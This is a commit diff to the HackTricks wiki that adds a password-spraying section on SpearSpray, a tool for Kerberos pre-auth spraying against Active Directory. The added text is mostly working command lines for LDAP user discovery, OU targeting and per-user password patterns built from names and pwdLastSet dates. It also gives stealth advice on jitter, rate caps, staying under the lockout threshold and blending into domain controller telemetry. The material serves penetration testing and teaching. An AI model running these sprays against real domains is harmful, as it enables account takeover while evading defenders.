Merge pull request #1337 from HackTricks-wiki/update_SpearSpray___Pattern-driven__Kerberos-based_AD_pas_20250825_182847

carlospolop · web-flow · commit dd01833124b7 · 2025-08-26T20:02:10.000+02:00
SpearSpray — Pattern-driven, Kerberos-based AD password spra...
diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md
@@ -109,6 +109,81 @@ Invoke-SprayEmptyPassword
 legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
 ```
 
+### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
+
+Kerberos pre-auth–based spraying reduces noise vs SMB/NTLM/LDAP bind attempts and aligns better with AD lockout policies. SpearSpray couples LDAP-driven targeting, a pattern engine, and policy awareness (domain policy + PSOs + badPwdCount buffer) to spray precisely and safely. It can also tag compromised principals in Neo4j for BloodHound pathing.
+
+Key ideas:
+- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
+- Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking users.
+- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
+- Pattern-based, per-user password generation using variables like names and temporal values derived from each user’s pwdLastSet.
+- Throughput control with threads, jitter, and max requests per second.
+- Optional Neo4j integration to mark owned users for BloodHound.
+
+Basic usage and discovery:
+
+```bash
+# List available pattern variables
+spearspray -l
+
+# Basic run (LDAP bind over TCP/389)
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
+
+# LDAPS (TCP/636)
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
+```
+
+Targeting and pattern control:
+
+```bash
+# Custom LDAP filter (e.g., target specific OU/attributes)
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
+  -q "(&(objectCategory=person)(objectClass=user)(department=IT))"
+
+# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
+```
+
+Stealth and safety controls:
+
+```bash
+# Control concurrency, add jitter, and cap request rate
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
+
+# Leave N attempts in reserve before lockout (default threshold: 2)
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
+```
+
+Neo4j/BloodHound enrichment:
+
+```bash
+spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
+```
+
+Pattern system overview (patterns.txt):
+
+```text
+# Example templates consuming per-user attributes and temporal context
+{name}{separator}{year}{suffix}
+{month_en}{separator}{short_year}{suffix}
+{season_en}{separator}{year}{suffix}
+{samaccountname}
+{extra}{separator}{year}{suffix}
+```
+
+Available variables include:
+- {name}, {samaccountname}
+- Temporal from each user’s pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
+- Composition helpers and org token: {separator}, {suffix}, {extra}
+
+Operational notes:
+- Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
+- badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
+- Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.
+
+> Tip: SpearSpray’s default LDAP page size is 200; adjust with -lps as needed.
+
 ## Outlook Web Access
 
 There are multiples tools for p**assword spraying outlook**.
@@ -142,13 +217,15 @@ To use any of these tools, you need a user list and a password / a small list of
 
 ## References
 
+- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
+- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
+- [https://github.com/Greenwolf/Spray](https://github.com/Greenwolf/Spray)
+- [https://github.com/Hackndo/sprayhound](https://github.com/Hackndo/sprayhound)
+- [https://github.com/login-securite/conpass](https://github.com/login-securite/conpass)
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
 - [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
 - [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
 - [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
 
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
